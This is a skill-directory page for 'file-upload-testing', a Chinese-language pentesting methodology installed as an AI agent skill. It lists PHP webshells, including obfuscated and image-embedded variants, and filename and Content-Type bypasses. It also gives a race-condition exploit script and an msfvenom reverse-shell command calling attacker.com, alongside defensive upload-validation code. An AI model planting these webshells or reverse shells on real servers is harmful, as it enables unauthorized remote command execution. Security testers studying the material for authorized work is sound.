MCP.directory

file-upload-testing

by Ed1s0nZ
1
0
Source

文件上传漏洞测试的专业技能和方法论

Install

mkdir -p .claude/skills/file-upload-testing && curl -L -o skill.zip "https://mcp.directory/api/skills/download/4389" && unzip -o skill.zip -d .claude/skills/file-upload-testing && rm skill.zip

Installs to .claude/skills/file-upload-testing

About this skill

文件上传漏洞测试

概述

文件上传功能是Web应用常见功能,但存在多种安全风险。本技能提供文件上传漏洞的检测、利用和防护方法。

漏洞类型

1. 未验证文件类型

仅前端验证:

// 可被绕过
if (!file.name.endsWith('.jpg')) {
  alert('只允许上传图片');
}

2. 文件内容未验证

仅检查扩展名:

// 危险代码
if (pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION) == 'jpg') {
  move_uploaded_file($_FILES['file']['tmp_name'], 'uploads/' . $filename);
}

3. 路径遍历

未过滤文件名:

filename: ../../../etc/passwd
filename: ..\..\..\windows\system32\config\sam

4. 文件名覆盖

可预测的文件名:

uploads/1.jpg
uploads/2.jpg

测试方法

1. 基础检测

测试各种文件类型:

  • .php, .jsp, .asp, .aspx
  • .php3, .php4, .php5, .phtml
  • .jspx, .jspf
  • .htaccess, .htpasswd

测试双扩展名:

shell.php.jpg
shell.jpg.php

测试大小写:

shell.PHP
shell.PhP

2. 内容类型绕过

修改Content-Type:

Content-Type: image/jpeg
# 但文件内容是PHP代码

Magic Bytes:

// 在PHP代码前添加图片头
GIF89a<?php phpinfo(); ?>

3. 解析漏洞

Apache解析漏洞:

shell.php.xxx  # Apache可能解析为PHP

IIS解析漏洞:

shell.asp;.jpg
shell.asp:.jpg

Nginx解析漏洞:

shell.jpg%00.php

4. 竞争条件

文件上传后立即访问:

# 上传.php文件,在上传完成但删除前访问
import requests
import threading

def upload():
    files = {'file': ('shell.php', '<?php system($_GET["cmd"]); ?>')}
    requests.post('http://target.com/upload', files=files)

def access():
    time.sleep(0.1)
    requests.get('http://target.com/uploads/shell.php?cmd=id')

threading.Thread(target=upload).start()
threading.Thread(target=access).start()

利用技术

PHP WebShell

基础WebShell:

<?php system($_GET['cmd']); ?>

一句话木马:

<?php eval($_POST['a']); ?>

绕过过滤:

<?php
$_GET['cmd']($_POST['a']);
// 使用: ?cmd=system

.htaccess利用

上传.htaccess:

AddType application/x-httpd-php .jpg

然后上传shell.jpg(实际是PHP代码)

图片马

GIF图片马:

GIF89a
<?php
phpinfo();
?>

PNG图片马:

# 使用工具将PHP代码嵌入PNG
python3 png2php.py shell.php shell.png

文件包含配合

如果存在文件包含漏洞:

# 上传包含PHP代码的图片
# 然后通过文件包含执行
?file=uploads/shell.jpg

绕过技术

扩展名绕过

双扩展名:

shell.php.jpg
shell.php;.jpg
shell.php%00.jpg

大小写:

shell.PHP
shell.PhP

特殊字符:

shell.php.
shell.php 
shell.php%20

Content-Type绕过

修改请求头:

Content-Type: image/jpeg
Content-Type: image/png
Content-Type: image/gif

Magic Bytes绕过

添加文件头:

// JPEG
\xFF\xD8\xFF\xE0<?php phpinfo(); ?>

// GIF
GIF89a<?php phpinfo(); ?>

// PNG
\x89\x50\x4E\x47<?php phpinfo(); ?>

代码混淆

使用短标签:

<?= system($_GET['cmd']); ?>

使用变量:

<?php
$a='sys';
$b='tem';
$a.$b($_GET['cmd']);

工具使用

Burp Suite

  1. 拦截文件上传请求
  2. 修改文件名和内容
  3. 测试各种绕过技术

Upload Bypass

# 使用各种技术测试文件上传
python upload_bypass.py -u http://target.com/upload -f shell.php

WebShell生成

# 生成各种WebShell
msfvenom -p php/meterpreter/reverse_tcp LHOST=attacker.com LPORT=4444 -f raw > shell.php

验证和报告

验证步骤

  1. 确认可以上传恶意文件
  2. 验证文件可以执行
  3. 评估影响(命令执行、数据泄露等)
  4. 记录完整的POC

报告要点

  • 漏洞位置和上传功能
  • 可上传的文件类型和执行方式
  • 完整的利用步骤和PoC
  • 修复建议(文件类型验证、内容检查、安全存储等)

防护措施

推荐方案

  1. 文件类型白名单

    ALLOWED_EXTENSIONS = {'jpg', 'png', 'gif'}
ext = filename.rsplit('.', 1)[1].lower()
if ext not in ALLOWED_EXTENSIONS:
    raise ValueError("File type not allowed")

  2. 文件内容验证

    import magic
file_type = magic.from_buffer(file_content, mime=True)
if not file_type.startswith('image/'):
    raise ValueError("Invalid file content")

  3. 重命名文件

    import uuid
filename = str(uuid.uuid4()) + '.' + ext

  4. 隔离存储

    • 文件存储在Web根目录外
    • 通过脚本代理访问
    • 禁用执行权限

  5. 文件扫描

    • 使用杀毒软件扫描
    • 检查文件内容
    • 移除可执行权限

  6. 大小限制

    MAX_SIZE = 5 * 1024 * 1024  # 5MB
if file.size > MAX_SIZE:
    raise ValueError("File too large")

注意事项

  • 仅在授权测试环境中进行
  • 避免上传恶意文件到生产环境
  • 测试后及时清理
  • 注意不同服务器的解析差异

More by Ed1s0nZ

View all skills by Ed1s0nZ

xpath-injection-testing

Ed1s0nZ

XPath注入漏洞测试的专业技能和方法论

00

csrf-testing

Ed1s0nZ

CSRF跨站请求伪造测试的专业技能和方法论

00

cloud-security-audit

Ed1s0nZ

云安全审计的专业技能和方法论

10

xss-testing

Ed1s0nZ

XSS跨站脚本攻击测试的专业技能

20

api-security-testing

Ed1s0nZ

API安全测试的专业技能和方法论

30

deserialization-testing

Ed1s0nZ

反序列化漏洞测试的专业技能和方法论

60

You might also like

flutter-development

aj-geddes

Build beautiful cross-platform mobile apps with Flutter and Dart. Covers widgets, state management with Provider/BLoC, navigation, API integration, and material design.

641968

drawio-diagrams-enhanced

jgtolentino

Create professional draw.io (diagrams.net) diagrams in XML format (.drawio files) with integrated PMP/PMBOK methodologies, extensive visual asset libraries, and industry-standard professional templates. Use this skill when users ask to create flowcharts, swimlane diagrams, cross-functional flowcharts, org charts, network diagrams, UML diagrams, BPMN, project management diagrams (WBS, Gantt, PERT, RACI), risk matrices, stakeholder maps, or any other visual diagram in draw.io format. This skill includes access to custom shape libraries for icons, clipart, and professional symbols.

590705

godot

bfollington

This skill should be used when working on Godot Engine projects. It provides specialized knowledge of Godot's file formats (.gd, .tscn, .tres), architecture patterns (component-based, signal-driven, resource-based), common pitfalls, validation tools, code templates, and CLI workflows. The `godot` command is available for running the game, validating scripts, importing resources, and exporting builds. Use this skill for tasks involving Godot game development, debugging scene/resource files, implementing game systems, or creating new Godot components.

339397

ui-ux-pro-max

nextlevelbuilder

"UI/UX design intelligence. 50 styles, 21 palettes, 50 font pairings, 20 charts, 8 stacks (React, Next.js, Vue, Svelte, SwiftUI, React Native, Flutter, Tailwind). Actions: plan, build, create, design, implement, review, fix, improve, optimize, enhance, refactor, check UI/UX code. Projects: website, landing page, dashboard, admin panel, e-commerce, SaaS, portfolio, blog, mobile app, .html, .tsx, .vue, .svelte. Elements: button, modal, navbar, sidebar, card, table, form, chart. Styles: glassmorphism, claymorphism, minimalism, brutalism, neumorphism, bento grid, dark mode, responsive, skeuomorphism, flat design. Topics: color palette, accessibility, animation, layout, typography, font pairing, spacing, hover, shadow, gradient."

318395

nano-banana-pro

garg-aayush

Generate and edit images using Google's Nano Banana Pro (Gemini 3 Pro Image) API. Use when the user asks to generate, create, edit, modify, change, alter, or update images. Also use when user references an existing image file and asks to modify it in any way (e.g., "modify this image", "change the background", "replace X with Y"). Supports both text-to-image generation and image-to-image editing with configurable resolution (1K default, 2K, or 4K for high resolution). DO NOT read the image file first - use this skill directly with the --input-image parameter.

450339

fastapi-templates

wshobson

Create production-ready FastAPI projects with async patterns, dependency injection, and comprehensive error handling. Use when building new FastAPI applications or setting up backend API projects.

304231

Stay ahead of the MCP ecosystem

Get weekly updates on new skills and servers.